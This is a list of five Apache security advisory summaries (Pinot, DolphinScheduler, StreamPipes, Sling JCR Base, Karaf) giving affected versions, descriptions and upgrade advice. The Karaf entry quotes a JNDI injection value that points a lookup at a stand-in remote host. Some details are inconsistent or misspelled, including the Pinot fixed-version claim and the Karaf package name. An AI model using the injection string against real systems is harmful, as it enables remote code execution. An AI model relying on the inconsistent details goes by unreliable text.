Xun Bai

**Name of the Vulnerable Software and Affected Versions** Apache Pinot versions 0.1 through 1.0.0 **Description** The issue affects Apache Pinot, allowing the exposure of sensitive information to unauthorized actors. When a request is made to the `/appconfigs` path, it can lead to the disclosure of system information, environment information, and Pinot configurations. This issue was addressed by implementing Role-based Access Control, which allows for access control to the `/appConfigs` endpoint and other APIs, restricting access to only authorized users. **Recommendations** To resolve the issue, users are recommended to upgrade to version 1.0.0 and configure RBAC, which fixes the issue. Additionally, users need to add the admin role accordingly to the RBAC guide to control access to the `/appconfigs` endpoint.

**Name of the Vulnerable Software and Affected Versions** Apache DolphinScheduler versions 3.1.0 through 3.2.1 **Description** A file read and write vulnerability exists in Apache DolphinScheduler, allowing authenticated users to illegally access additional resource files. **Recommendations** For Apache DolphinScheduler versions 3.1.0 through 3.2.1, upgrade to version 3.2.2 to fix the issue.

**Name of the Vulnerable Software and Affected Versions** Apache StreamPipes versions 0.69.0 through 0.91.0 **Description** A REST interface in Apache StreamPipes was not properly restricted to admin-only access. This allowed a non-admin user with valid login credentials to elevate privileges beyond the initially assigned roles. **Recommendations** For Apache StreamPipes versions 0.69.0 through 0.91.0, upgrade to StreamPipes 0.92.0 to resolve the issue. As a temporary workaround, consider restricting access to the REST interface to minimize the risk of exploitation.

**Name of the Vulnerable Software and Affected Versions** Apache Sling JCR Base versions prior to 3.1.12 **Description** The issue is related to a critical injection vulnerability in Apache Sling JCR Base when running on old JDK versions, specifically JDK 1.8.191 or earlier. This vulnerability occurs through utility functions in RepositoryAccessor, particularly the `getRepository` and `getRepositoryFromURL` functions, which allow an application to access data stored in a remote location via JDNI and RMI. **Recommendations** For Apache Sling JCR Base versions prior to 3.1.12, upgrade to Apache Sling JCR Base 3.1.12 or later. Alternatively, run Apache Sling JCR Base on a more recent JDK version to mitigate the issue.

**Name of the Vulnerable Software and Affected Versions** Apache Karaf versions prior to 4.4.2 and 4.3.8 **Description** This issue is about a potential code injection when an attacker has control of the target LDAP server using the JDBC JNDI URL. The function `jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource` uses `InitialContext.lookup(jndiName)` without filtering. A user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in `JdbcLoginModuleTest#setup`. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server. **Recommendations** To resolve the issue, upgrade to Apache Karaf version 4.4.2 or 4.3.8. As a temporary workaround, consider restricting the use of the `JDBCUtils#doCreateDatasource` function until a patch is available. Avoid using the `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` configuration in `JdbcLoginModuleTest#setup` to minimize the risk of exploitation.